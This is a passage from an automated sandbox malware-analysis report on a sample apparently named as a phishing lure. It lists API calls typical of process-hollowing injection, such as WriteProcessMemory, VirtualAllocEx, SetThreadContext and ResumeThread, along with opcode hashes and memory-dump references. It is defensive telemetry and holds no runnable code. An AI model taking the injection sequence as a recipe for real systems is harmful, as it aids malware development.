                        • Opcode Fuzzy Hash: e3be6a105fcc51010c4f428ceec150fe4a281ecff4e5e21bd2ca510d27cdb0b1
                        • Instruction Fuzzy Hash: 0631DFB18087988FD701DF9DD4A47DEBFF4EF19314F04406AD084AB252C274A444CBA6
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DD9510
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: bddd8e7bbfaf211ecddf82a5804e37da8fa77f339c1c83cc2a275672925012cb
                        • Instruction ID: acca1c58160585adf3f265150d90967a09283d9ecf6fba986dfb33a5a4bdd35e
                        • Opcode Fuzzy Hash: bddd8e7bbfaf211ecddf82a5804e37da8fa77f339c1c83cc2a275672925012cb
                        • Instruction Fuzzy Hash: 532157B59003199FDB10CFA9C885BEEBBF0FF48310F10842AE959A7240C778A545CBA4
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DD9510
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: a0f453427f923ea92f9699e92d097ffe10bec82da4fdd02af2828aba10769535
                        • Instruction ID: 4356f7c49395a87df5cc5786ab455ed271dc46b2dd9e5b26fab723bc5cd5d0de
                        • Opcode Fuzzy Hash: a0f453427f923ea92f9699e92d097ffe10bec82da4fdd02af2828aba10769535
                        • Instruction Fuzzy Hash: 4C2139B19003599FCB10CFA9C885BDEBBF5FF48310F10842AE959A7250C779A944CBA5
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136D656,?,?,?,?,?), ref: 0136D717
                        Memory Dump Source
                        • Source File: 00000000.00000002.1643286788.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1360000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: c73ab676d256e42251d4e224745117b5c2ac882359eb4ef43406a6472e68eb16
                        • Instruction ID: 1f4c117d425ae29b95fa346ebb594e07d6e5f7849590f834f5b548ec3a38db66
                        • Opcode Fuzzy Hash: c73ab676d256e42251d4e224745117b5c2ac882359eb4ef43406a6472e68eb16
                        • Instruction Fuzzy Hash: 8321E5B59003489FDB10CF9AD584ADEFFF8EB48324F14841AE958A7310D378A954CFA5
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04DD8F2E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 12aa48636440c71e805dc2a525d65ee741ac11942be2cee81886c929c5092072
                        • Instruction ID: 4d4018a27d23015646072e008f8cca760b907b3659dd4c548f16189f7a98024d
                        • Opcode Fuzzy Hash: 12aa48636440c71e805dc2a525d65ee741ac11942be2cee81886c929c5092072
                        • Instruction Fuzzy Hash: 692147B1D003098FDB14DFA9C5857EEBBF5EF48324F10842AE459A7240CB78A985CFA5
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DD95F0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 233c783fac946751fbd4d9b747b481a5868a25289f648a24981fe4c3988ae349
                        • Instruction ID: 39175c9f0ca779dc8930f2f8e5b8b0ac628831671a347382e5a4567b71dd86c9
                        • Opcode Fuzzy Hash: 233c783fac946751fbd4d9b747b481a5868a25289f648a24981fe4c3988ae349
                        • Instruction Fuzzy Hash: 9E2128B18003599FCB10DFAAC885ADEFBF5FF48320F508429E559A7250C735A544CBA5
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04DD8F2E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 6127739232f934515dd674295fec049437fed5fd7bc2b07012af35ea1cd66a6e
                        • Instruction ID: 0b36edd6629ed47e7a597625fa6c0a0db9c67c13de8770f31db5b88138577236
                        • Opcode Fuzzy Hash: 6127739232f934515dd674295fec049437fed5fd7bc2b07012af35ea1cd66a6e
                        • Instruction Fuzzy Hash: E7212CB19003098FDB14DFAAC4857EEBBF5EF48324F54842AE459A7240C778A545CFA5
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136D656,?,?,?,?,?), ref: 0136D717
                        Memory Dump Source
                        • Source File: 00000000.00000002.1643286788.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1360000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 2f710d1224cc3e34e7dbe3ecc1f09dd3a454535562b4eb655fd1f4816e327811
                        • Instruction ID: 93e838206ec0b00784d2c8bfd98f8a6a28fc538ab50b80f0d2f27d039a7eaa7d
                        • Opcode Fuzzy Hash: 2f710d1224cc3e34e7dbe3ecc1f09dd3a454535562b4eb655fd1f4816e327811
                        • Instruction Fuzzy Hash: 0121E0B5900259DFDB10CFA9D984ADEBBF8EB48324F14841AE958A3210D378A944CFA5
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DD95F0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 2fc4d90d37d4e2f9badb155d8ac0cd55019d16f02a73b60b074eb0b92c9e887d
                        • Instruction ID: 95e2645a0f4cc657fd346d6029270925169e3d8201b88f096e3e37ee608915df
                        • Opcode Fuzzy Hash: 2fc4d90d37d4e2f9badb155d8ac0cd55019d16f02a73b60b074eb0b92c9e887d
                        • Instruction Fuzzy Hash: 232125B1C003599FCB10DFA9C985BEEBBF5FF48320F10842AE959A7250C7389944CBA5
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DD942E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: c97cede37a450881e2824d21dfe7a2d9a511ef32ecf96bbe038726f1fc2b9755
                        • Instruction ID: ff78e9adc0f4ef86a975a901a640a07bed75c6c9ba55f1f4f110d5f86ba4ab6e
                        • Opcode Fuzzy Hash: c97cede37a450881e2824d21dfe7a2d9a511ef32ecf96bbe038726f1fc2b9755
                        • Instruction Fuzzy Hash: D31167B6800208CFCB10CFA9C845BEEBFF5EF48324F20881AE559A7650C775A581CFA5
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0136B079,00000800,00000000,00000000), ref: 0136B28A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1643286788.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1360000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 012aa5f1ec0d4c5462ec3b71711c62e875e60daafaf6bf7dc7868782c55224a4
                        • Instruction ID: ec88a48dbebe6b9d8a1f3eee199fa04be8e95842beb59b434d3671acde85c812
                        • Opcode Fuzzy Hash: 012aa5f1ec0d4c5462ec3b71711c62e875e60daafaf6bf7dc7868782c55224a4
                        • Instruction Fuzzy Hash: 751126B69003098FDB10CF9AD444BDEFBF8EB48314F10842AE559A7214C375A545CFA5
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0136B079,00000800,00000000,00000000), ref: 0136B28A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1643286788.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1360000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 26a0f526314a75bd7625e75154e9d523089c0b98bc590eafe98e0bd24a75cbdc
                        • Instruction ID: 6227aabefdd35ea3ef380bcf3a68142cb88b0bada10f1d5b580573268e27046a
                        • Opcode Fuzzy Hash: 26a0f526314a75bd7625e75154e9d523089c0b98bc590eafe98e0bd24a75cbdc
                        • Instruction Fuzzy Hash: CF1153B69003088FDB10CFAAC444ADEFFF4EB48320F10842AE859A7210C374A545CFA4
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DD942E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 413c734f0962ced0c4cbf86833303a536a1abcdeac8c66b484cf253d535c6e0b
                        • Instruction ID: ae9694094d7ed7bdf0b46a32336d46058240f894b126db628cae6c5621f480f5
                        • Opcode Fuzzy Hash: 413c734f0962ced0c4cbf86833303a536a1abcdeac8c66b484cf253d535c6e0b
                        • Instruction Fuzzy Hash: 611134B29002499FCB10DFAAC844BDFBFF5EF88324F208419E559A7250C775A944CFA5
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: c827aa4f174a4567974d6182367705f2281b3bc4249fedf73e810990a816d38f
                        • Instruction ID: 74fe8f089ad67542d705e2dc6991343bbbb64d6144b7ea09542ebca9dff54121
                        • Opcode Fuzzy Hash: c827aa4f174a4567974d6182367705f2281b3bc4249fedf73e810990a816d38f
                        • Instruction Fuzzy Hash: B21158B1D003498FDB10DFAAC4457EEFBF4AB48324F20881AD059A7240C775A545CFA4
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 72203f7c141ff08f6f6563315ddc3549c5b85f9bc28c82a99be412ec7c8b0560
                        • Instruction ID: ecbf241b4a28de3b6e709ba1556e8cdad71b0b903ed3ea8a8fcab76a1794edcb
                        • Opcode Fuzzy Hash: 72203f7c141ff08f6f6563315ddc3549c5b85f9bc28c82a99be412ec7c8b0560
                        • Instruction Fuzzy Hash: 4D1125B19003488FDB20DFAAC4457EEFBF4AB88324F208429D459A7250CA75A944CFA5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0136AFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1643286788.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1360000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: c0e29cf1466f59c6b5e77e6fdff83c2f76577aaea81e40af40ded4649a4e3f66
                        • Instruction ID: d8ab1d2208a7a514491fd11645979bc4fae96149f9c794bc0a38f5f36bacc3fc
                        • Opcode Fuzzy Hash: c0e29cf1466f59c6b5e77e6fdff83c2f76577aaea81e40af40ded4649a4e3f66
                        • Instruction Fuzzy Hash: 771110B5D003498FDB14CF9AC444BDEFBF8AB88328F10C42AD569A7214C375A545CFA1
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04DDBA2D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: e43c3b33421af37124110eb43c0edc84473dff8f0d2adbe5b0b612e10be4c385
                        • Instruction ID: 6f504d4462d6108a72032a116acbe34e80bad5cb616e9da3526c8dd8a659859f
                        • Opcode Fuzzy Hash: e43c3b33421af37124110eb43c0edc84473dff8f0d2adbe5b0b612e10be4c385
                        • Instruction Fuzzy Hash: 3B1103B5800348DFDB10DF9AD484BEEFBF8EB48324F10841AE559A7201D3B5A984CFA5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04DDBA2D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: d3e5cd8cb657a2af99778444bfb915bbd37e957f585ddd72660b2d8b555effe2
                        • Instruction ID: 2368b39b1dbf9fa7b41bb9ab6538a6ddaef755bbcfb43e3e32ea145d2b27b45d
                        • Opcode Fuzzy Hash: d3e5cd8cb657a2af99778444bfb915bbd37e957f585ddd72660b2d8b555effe2
                        • Instruction Fuzzy Hash: C311C2B5800349DFDB10DF99D589BDEBBF8AB48324F10841AE558A7610D375A584CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642311718.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fbd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 899c7cb3a2d1fef3ebe39c959d8c495f82cda103f42d987505b34ab4928044a1
                        • Instruction ID: 52f2f169d510a351ba9b79c3b387df83f9cd303f54c483475afdafc8a06e78a2
                        • Opcode Fuzzy Hash: 899c7cb3a2d1fef3ebe39c959d8c495f82cda103f42d987505b34ab4928044a1
                        • Instruction Fuzzy Hash: 84213372900280DFCB05DF05D9C0B6ABF65FB88320F20C169ED090B256D336D816EFA2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642311718.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fbd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae450dddf68ffe2e08e7ce8206b588b503aeff94f0f7d4e9fac071cbf17444e4
                        • Instruction ID: e18a193b1e7a7b421e676dac51a8c8e3623d8c4f130335b20c0b2f3a40f4d55d
                        • Opcode Fuzzy Hash: ae450dddf68ffe2e08e7ce8206b588b503aeff94f0f7d4e9fac071cbf17444e4
                        • Instruction Fuzzy Hash: F9214572900200DFCB15DF14C9C0B66BF65FB98328F28C169E8090B256D336D846EEA2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642349352.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fcd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8cc004b166feafd32555033890b35d5c3add8b4e5d32f5c5a4b89971bb1c34e
                        • Instruction ID: 9c403de741f4c9494a42032edf58a6befa7c87a85cc01fbfdad5cdd4f3f77153
                        • Opcode Fuzzy Hash: d8cc004b166feafd32555033890b35d5c3add8b4e5d32f5c5a4b89971bb1c34e
                        • Instruction Fuzzy Hash: E421F571584201DFCB14DF18D6C5F1ABBA5FB84324F20C57DD84A4B25AC336D847DA61
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642349352.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fcd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 528f8ea4a808a5e2266778316450f398a7b9727f633ddf7404f61bf10db1885e
                        • Instruction ID: 556a845e01b30d5577a1bf331f50f22e9718b407c4587c3062c101657756627b
                        • Opcode Fuzzy Hash: 528f8ea4a808a5e2266778316450f398a7b9727f633ddf7404f61bf10db1885e
                        • Instruction Fuzzy Hash: AF214672904201EFDB05DF14CAC1F2ABBA5FB84324F20C67DE8094B292C336D846DA61
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642349352.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fcd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92747110116f4c55f311046300e42c842ef0c55a4bdcf0ffb022eddf3cbbb537
                        • Instruction ID: f9f98cf71fcb3facc7558f3d05d768d3e324d6d7ec3659c08fe4b35d60d69240
                        • Opcode Fuzzy Hash: 92747110116f4c55f311046300e42c842ef0c55a4bdcf0ffb022eddf3cbbb537
                        • Instruction Fuzzy Hash: 662183755493808FD702CF24D594B15BF71EB46314F28C5EED8498F6A7C33A980ACB62
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642311718.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fbd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                        • Instruction ID: ba7d57bdfb6b4553d18fc3f68f8a9d2fc16e5d6646719ce77ea3bf2a40670b02
                        • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                        • Instruction Fuzzy Hash: D1219D76904280DFDB06CF50D9C4B56BF62FB94324F24C5A9DD090A656C33AD82ADFA2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642311718.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fbd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction ID: 3f09e9e397843732563c07f2d5419ebd0f12b85bb912549c4f721de356fb7245
                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction Fuzzy Hash: D411D676904240CFCB15CF14D5C4B56BF71FB94328F28C5A9D8450B656C336D456DFA2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642349352.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fcd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                        • Instruction ID: 5c6c6b25a70af572a843ba09f84a711d0b8355b1d9e75f82c114d5f15ead0a0f
                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                        • Instruction Fuzzy Hash: A011BE75904240DFCB05CF10CAC4B59BB61FB84324F24C6AED8494B256C33AD80ADB51
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642311718.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fbd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 717493a002d75d9e7c1c643c01b46f4f1ee58b1133ceb00630cc66e0e6bad687
                        • Instruction ID: 2da6fbfcb9debb0f59e42b48531bc2da11903a7b0a8f9b34d790d1cbe4819229
                        • Opcode Fuzzy Hash: 717493a002d75d9e7c1c643c01b46f4f1ee58b1133ceb00630cc66e0e6bad687
                        • Instruction Fuzzy Hash: DE01A7714093409AE7104A27CD847E7FF98EF55374F38C56AED094A286DA799840DAB2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1642311718.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_fbd000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf4647a91bcd50cf85d0cf8f09bcab4e12c5ba98a1f4dd486b22e0070f767dd0
                        • Instruction ID: f231b4f5267658f42236f6c43c7911416f41332b9e6775d538f84efde178130c
                        • Opcode Fuzzy Hash: cf4647a91bcd50cf85d0cf8f09bcab4e12c5ba98a1f4dd486b22e0070f767dd0
                        • Instruction Fuzzy Hash: DAF0C2714053409EE7108A16CCC4BA2FFA8EF50734F28C45AED080A286C6799840CAB1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e41af671268f659df2a44cb1ba1906da2f85ca38a86c5f61a324cc19d83853eb
                        • Instruction ID: e01c8f881d03df767ede5174a76398261b98fa291fb3f480a15195dc91a314b9
                        • Opcode Fuzzy Hash: e41af671268f659df2a44cb1ba1906da2f85ca38a86c5f61a324cc19d83853eb
                        • Instruction Fuzzy Hash: C2C1CA717016009FEB29DB79C8507AAB7FBAFC9704F10846ED246DB294DB35E802CB61
                        Memory Dump Source
                        • Source File: 00000000.00000002.1646324139.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5350000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ecaacb5dd271daa5cdd5003ca05720b3bd97c1338b2ff93de2ed63a77f5d9b0
                        • Instruction ID: 053a6f9d7dfab43ceee4e0aabd24a4a5ff4583865db42358147e093793561884
                        • Opcode Fuzzy Hash: 9ecaacb5dd271daa5cdd5003ca05720b3bd97c1338b2ff93de2ed63a77f5d9b0
                        • Instruction Fuzzy Hash: B612A9B1622B85DBEB10CF65F84E18A7FB2BF45318B504209E2612F6E5DFB8114ACF44
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7bc4f2c429e7acdb61255d573495567f81eab10c3ee13f4018bc5e794c606300
                        • Instruction ID: fcd8fa0e1652f7a61736f468dffc61e7247f5c46531dfb0964af767ac100f2f3
                        • Opcode Fuzzy Hash: 7bc4f2c429e7acdb61255d573495567f81eab10c3ee13f4018bc5e794c606300
                        • Instruction Fuzzy Hash: 61E10C74E1021A8FCB14DFA9C5809AEFBF2FF89304F248169E455AB35AD730A941DF61
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8bff449080a697ad203bb257c82962bfbbc3706acb118f94e6b390001389b820
                        • Instruction ID: a886caf07f2fe714f10e62d763de82a73965b6f3a4c64340f639c76eace89165
                        • Opcode Fuzzy Hash: 8bff449080a697ad203bb257c82962bfbbc3706acb118f94e6b390001389b820
                        • Instruction Fuzzy Hash: F7E1DA74E1011A8FCB14DFA9C5809AEFBF2FF89305F248169E415AB35AD731A941CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 438003a3a34a0ab688a4fa467fe80281f9cd98a2a136cf5d227303e9bdc0fef3
                        • Instruction ID: edbfbc18ec9bcfe8ae457e2e48b1398bc3a51e2764d590ae56c5fd00f2ed4b03
                        • Opcode Fuzzy Hash: 438003a3a34a0ab688a4fa467fe80281f9cd98a2a136cf5d227303e9bdc0fef3
                        • Instruction Fuzzy Hash: 06E1CA74E1011A8FCB14DFA9C5809AEFBF2FF89304F249169E415AB356D731A941CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb6ddcf80d3648e8f7290f07647321050bc21a4b221db05f05e154a783e0c09a
                        • Instruction ID: 65bdb3f6a80d7f1387d999d476bd6cfce710209d10c460ddebe61ad973596487
                        • Opcode Fuzzy Hash: fb6ddcf80d3648e8f7290f07647321050bc21a4b221db05f05e154a783e0c09a
                        • Instruction Fuzzy Hash: D6E1EAB4E1011A8FCB14DFA9C5909AEFBF2BF89304F248169E415AB356D731A941CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a081ef347dd3807fde001a3ba710cc68dbdd92c0b4734fe5bc4d530d3c7426db
